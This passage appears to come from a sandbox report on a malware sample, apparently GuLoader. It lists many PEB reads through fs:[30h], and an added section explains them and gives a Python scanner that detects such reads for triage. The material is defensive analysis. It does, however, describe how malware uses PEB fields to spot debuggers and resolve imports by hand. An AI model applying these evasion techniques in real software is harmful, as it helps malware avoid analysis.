      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h] 2_2_1E239240
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h] 2_2_1E239240
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h] 2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h] 2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h] 2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h] 2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h] 2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h] 2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2C4257 mov eax, dword ptr fs:[00000030h] 2_2_1E2C4257
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2B46A7 mov eax, dword ptr fs:[00000030h] 2_2_1E2B46A7
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24AAB0 mov eax, dword ptr fs:[00000030h] 2_2_1E24AAB0
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24AAB0 mov eax, dword ptr fs:[00000030h] 2_2_1E24AAB0
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 2_2_1E300EA5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 2_2_1E300EA5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 2_2_1E300EA5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26FAB0 mov eax, dword ptr fs:[00000030h] 2_2_1E26FAB0
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2CFE87 mov eax, dword ptr fs:[00000030h] 2_2_1E2CFE87
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26D294 mov eax, dword ptr fs:[00000030h] 2_2_1E26D294
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26D294 mov eax, dword ptr fs:[00000030h] 2_2_1E26D294
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2616E0 mov ecx, dword ptr fs:[00000030h] 2_2_1E2616E0
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2476E2 mov eax, dword ptr fs:[00000030h] 2_2_1E2476E2
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E278EC7 mov eax, dword ptr fs:[00000030h] 2_2_1E278EC7
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E308ED6 mov eax, dword ptr fs:[00000030h] 2_2_1E308ED6
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2636CC mov eax, dword ptr fs:[00000030h] 2_2_1E2636CC
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h] 2_2_1E2EFEC0
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E234F2E mov eax, dword ptr fs:[00000030h] 2_2_1E234F2E
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E234F2E mov eax, dword ptr fs:[00000030h] 2_2_1E234F2E
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26E730 mov eax, dword ptr fs:[00000030h] 2_2_1E26E730
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26A70E mov eax, dword ptr fs:[00000030h] 2_2_1E26A70E
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26A70E mov eax, dword ptr fs:[00000030h] 2_2_1E26A70E
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2F131B mov eax, dword ptr fs:[00000030h] 2_2_1E2F131B
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2CFF10 mov eax, dword ptr fs:[00000030h] 2_2_1E2CFF10
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2CFF10 mov eax, dword ptr fs:[00000030h] 2_2_1E2CFF10
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E30070D mov eax, dword ptr fs:[00000030h] 2_2_1E30070D
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E30070D mov eax, dword ptr fs:[00000030h] 2_2_1E30070D
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23DB60 mov ecx, dword ptr fs:[00000030h] 2_2_1E23DB60
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24FF60 mov eax, dword ptr fs:[00000030h] 2_2_1E24FF60
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E308F6A mov eax, dword ptr fs:[00000030h] 2_2_1E308F6A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E263B7A mov eax, dword ptr fs:[00000030h] 2_2_1E263B7A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E263B7A mov eax, dword ptr fs:[00000030h] 2_2_1E263B7A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23DB40 mov eax, dword ptr fs:[00000030h] 2_2_1E23DB40
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24EF40 mov eax, dword ptr fs:[00000030h] 2_2_1E24EF40
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E308B58 mov eax, dword ptr fs:[00000030h] 2_2_1E308B58
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23F358 mov eax, dword ptr fs:[00000030h] 2_2_1E23F358
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E305BA5 mov eax, dword ptr fs:[00000030h] 2_2_1E305BA5
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2F138A mov eax, dword ptr fs:[00000030h] 2_2_1E2F138A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E241B8F mov eax, dword ptr fs:[00000030h] 2_2_1E241B8F
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E241B8F mov eax, dword ptr fs:[00000030h] 2_2_1E241B8F
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2ED380 mov ecx, dword ptr fs:[00000030h] 2_2_1E2ED380
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26B390 mov eax, dword ptr fs:[00000030h] 2_2_1E26B390
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 2_2_1E2B7794
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 2_2_1E2B7794
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7794 mov eax, dword ptr fs:[00000030h]2_2_1E2B7794
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2737F5 mov eax, dword ptr fs:[00000030h]2_2_1E2737F5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26BC2C mov eax, dword ptr fs:[00000030h]2_2_1E26BC2C
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E304015 mov eax, dword ptr fs:[00000030h]2_2_1E304015
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E304015 mov eax, dword ptr fs:[00000030h]2_2_1E304015
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7016 mov eax, dword ptr fs:[00000030h]2_2_1E2B7016
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7016 mov eax, dword ptr fs:[00000030h]2_2_1E2B7016
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7016 mov eax, dword ptr fs:[00000030h]2_2_1E2B7016
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30740D mov eax, dword ptr fs:[00000030h]2_2_1E30740D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30740D mov eax, dword ptr fs:[00000030h]2_2_1E30740D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30740D mov eax, dword ptr fs:[00000030h]2_2_1E30740D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E301074 mov eax, dword ptr fs:[00000030h]2_2_1E301074
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25746D mov eax, dword ptr fs:[00000030h]2_2_1E25746D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F2073 mov eax, dword ptr fs:[00000030h]2_2_1E2F2073
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A44B mov eax, dword ptr fs:[00000030h]2_2_1E26A44B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E250050 mov eax, dword ptr fs:[00000030h]2_2_1E250050
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E250050 mov eax, dword ptr fs:[00000030h]2_2_1E250050
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CC450 mov eax, dword ptr fs:[00000030h]2_2_1E2CC450
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CC450 mov eax, dword ptr fs:[00000030h]2_2_1E2CC450
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2790AF mov eax, dword ptr fs:[00000030h]2_2_1E2790AF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov ecx, dword ptr fs:[00000030h]2_2_1E26F0BF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov eax, dword ptr fs:[00000030h]2_2_1E26F0BF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov eax, dword ptr fs:[00000030h]2_2_1E26F0BF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239080 mov eax, dword ptr fs:[00000030h]2_2_1E239080
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B3884 mov eax, dword ptr fs:[00000030h]2_2_1E2B3884
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B3884 mov eax, dword ptr fs:[00000030h]2_2_1E2B3884
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24849B mov eax, dword ptr fs:[00000030h]2_2_1E24849B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F14FB mov eax, dword ptr fs:[00000030h]2_2_1E2F14FB
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]2_2_1E2B6CF0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]2_2_1E2B6CF0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]2_2_1E2B6CF0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308CD6 mov eax, dword ptr fs:[00000030h]2_2_1E308CD6
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov ecx, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308D34 mov eax, dword ptr fs:[00000030h]2_2_1E308D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov ecx, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23AD30 mov eax, dword ptr fs:[00000030h]2_2_1E23AD30
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26513A mov eax, dword ptr fs:[00000030h]2_2_1E26513A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26513A mov eax, dword ptr fs:[00000030h]2_2_1E26513A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2BA537 mov eax, dword ptr fs:[00000030h]2_2_1E2BA537
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E264D3B mov eax, dword ptr fs:[00000030h]2_2_1E264D3B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E264D3B mov eax, dword ptr fs:[00000030h]2_2_1E264D3B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E264D3B mov eax, dword ptr fs:[00000030h]2_2_1E264D3B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239100 mov eax, dword ptr fs:[00000030h]2_2_1E239100
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239100 mov eax, dword ptr fs:[00000030h]2_2_1E239100
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239100 mov eax, dword ptr fs:[00000030h]2_2_1E239100
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23C962 mov eax, dword ptr fs:[00000030h]2_2_1E23C962
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B171 mov eax, dword ptr fs:[00000030h]2_2_1E23B171
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B171 mov eax, dword ptr fs:[00000030h]2_2_1E23B171
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25C577 mov eax, dword ptr fs:[00000030h]2_2_1E25C577
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25C577 mov eax, dword ptr fs:[00000030h]2_2_1E25C577
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25B944 mov eax, dword ptr fs:[00000030h]2_2_1E25B944
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25B944 mov eax, dword ptr fs:[00000030h]2_2_1E25B944
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E273D43 mov eax, dword ptr fs:[00000030h]2_2_1E273D43
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B3540 mov eax, dword ptr fs:[00000030h]2_2_1E2B3540
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E257D50 mov eax, dword ptr fs:[00000030h]2_2_1E257D50
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2661A0 mov eax, dword ptr fs:[00000030h]2_2_1E2661A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2661A0 mov eax, dword ptr fs:[00000030h]2_2_1E2661A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2635A1 mov eax, dword ptr fs:[00000030h]2_2_1E2635A1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A185 mov eax, dword ptr fs:[00000030h]2_2_1E26A185
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25C182 mov eax, dword ptr fs:[00000030h]2_2_1E25C182
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26FD9B mov eax, dword ptr fs:[00000030h]2_2_1E26FD9B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26FD9B mov eax, dword ptr fs:[00000030h]2_2_1E26FD9B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]2_2_1E23B1E1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]2_2_1E23B1E1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]2_2_1E23B1E1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2C41E8 mov eax, dword ptr fs:[00000030h]2_2_1E2C41E8
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24D
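Every row above is the same primitive: on 32-bit Windows, fs:[30h] is the PEB pointer stored in the TEB, and a sample that reads it this densely (dozens of functions in the unpacked GuLoader stage) is doing it without calling any API, typically to test PEB.BeingDebugged (+0x02) and PEB.NtGlobalFlag (+0x68) for a debugger, or to walk PEB.Ldr (+0x0C) and resolve imports by hand. The report lists the loads but not which PEB field each one feeds. The following is an added example by the editor, not part of the Joe Sandbox report or of the sample: a static scanner that finds the opcode encodings of `mov r32, fs:[30h]` / `push fs:[30h]` in raw code bytes and, as a heuristic (an assumption of this example), labels each hit with the first `[reg+disp8]` access that follows it. The byte string it scans is constructed to resemble the three classic consumers; the three report rows it parses are copied verbatim from the table above. It is 32-bit only; the x64 equivalent (gs:[60h], different field offsets) is not covered.

```python
"""Static triage for 32-bit PEB reads such as the fs:[30h] loads listed in the report.

Added example, not part of the Joe Sandbox report. SAMPLE_CODE is constructed, and the
field classification is a heuristic (assumption): the first [reg+disp8] operand found
after the load is taken to be the PEB field being read.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Encodings of "load the PEB pointer from the TEB" on x86-32. fs:[30h] is
# TEB.ProcessEnvironmentBlock; eax has a short moffs32 form (A1), the rest use 8B /r.
_FS30_LOADS: Dict[bytes, str] = {
    b"\x64\xa1\x30\x00\x00\x00": "eax",
    b"\x64\x8b\x05\x30\x00\x00\x00": "eax",
    b"\x64\x8b\x0d\x30\x00\x00\x00": "ecx",
    b"\x64\x8b\x15\x30\x00\x00\x00": "edx",
    b"\x64\x8b\x1d\x30\x00\x00\x00": "ebx",
    b"\x64\x8b\x35\x30\x00\x00\x00": "esi",
    b"\x64\x8b\x3d\x30\x00\x00\x00": "edi",
    b"\x64\xff\x35\x30\x00\x00\x00": "push",  # push dword ptr fs:[30h]
}
_REG_INDEX = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esi": 6, "edi": 7}
# 32-bit PEB fields that anti-debug checks and import-free loaders usually consume.
_PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}


@dataclass(frozen=True)
class PebRead:
    offset: int            # offset of the fs:[30h] load in the scanned bytes
    register: str          # register receiving the PEB pointer, or "push"
    field: Optional[str]   # PEB field consumed shortly after, if recognised


def _classify_field(code: bytes, start: int, reg: str, window: int) -> Optional[str]:
    """Heuristic: first ModRM byte of form [reg+disp8] after the load, disp8 mapped to a field."""
    rm = _REG_INDEX.get(reg)
    if rm is None:
        return None
    for i in range(start, min(start + window, len(code) - 1)):
        modrm = code[i]
        if (modrm >> 6) == 0b01 and (modrm & 7) == rm:   # mod=01: [base + disp8]
            field = _PEB_FIELDS.get(code[i + 1])
            if field:
                return field
    return None


def find_peb_reads(code: bytes, window: int = 16) -> List[PebRead]:
    """Return every fs:[30h] load in `code`, ordered by offset, with its likely PEB field."""
    hits = []
    for pattern, reg in _FS30_LOADS.items():
        pos = code.find(pattern)
        while pos != -1:
            hits.append(PebRead(pos, reg, _classify_field(code, pos + len(pattern), reg, window)))
            pos = code.find(pattern, pos + 1)
    return sorted(hits, key=lambda h: h.offset)


def summarize(hits: List[PebRead]) -> Counter:
    """Count hits per PEB field; 'unknown' when the follow-up access was not recognised."""
    return Counter(h.field or "unknown" for h in hits)


_ROW_RE = re.compile(r"Code function: (\d+_\d+_[0-9A-Fa-f]+) mov (\w+), dword ptr fs:\[00000030h\]")


def count_report_rows(rows: List[str]) -> Counter:
    """Aggregate the report's flattened 'Code function' rows per (function, register)."""
    counts: Counter = Counter()
    for row in rows:
        m = _ROW_RE.search(row)
        if m:
            counts[(m.group(1), m.group(2))] += 1
    return counts


# Constructed sample: the three classic PEB consumers plus a decoy fs:[18h] (TEB self pointer).
SAMPLE_CODE = bytes.fromhex(
    "64a118000000"      # 0x00 mov eax, fs:[18h]             decoy, must not match
    "64a130000000"      # 0x06 mov eax, fs:[30h]
    "0fb64002"          # 0x0c movzx eax, byte ptr [eax+2]    BeingDebugged
    "85c0" "7502"       # 0x10 test eax, eax / jnz
    "648b0d30000000"    # 0x14 mov ecx, fs:[30h]
    "8b4168"            # 0x1b mov eax, [ecx+68h]             NtGlobalFlag
    "a970000000"        # 0x1e test eax, 70h
    "648b1530000000"    # 0x23 mov edx, fs:[30h]
    "8b520c"            # 0x2a mov edx, [edx+0Ch]             Ldr
    "8b5214"            # 0x2d mov edx, [edx+14h]             InMemoryOrderModuleList
    "c3"                # 0x30 ret
)

# Three rows copied from the report, in the flattened form they appear in.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov ecx, dword ptr fs:[00000030h]2_2_1E26F0BF",
    r"Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov eax, dword ptr fs:[00000030h]2_2_1E26F0BF",
    r"Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov eax, dword ptr fs:[00000030h]2_2_1E26F0BF",
]

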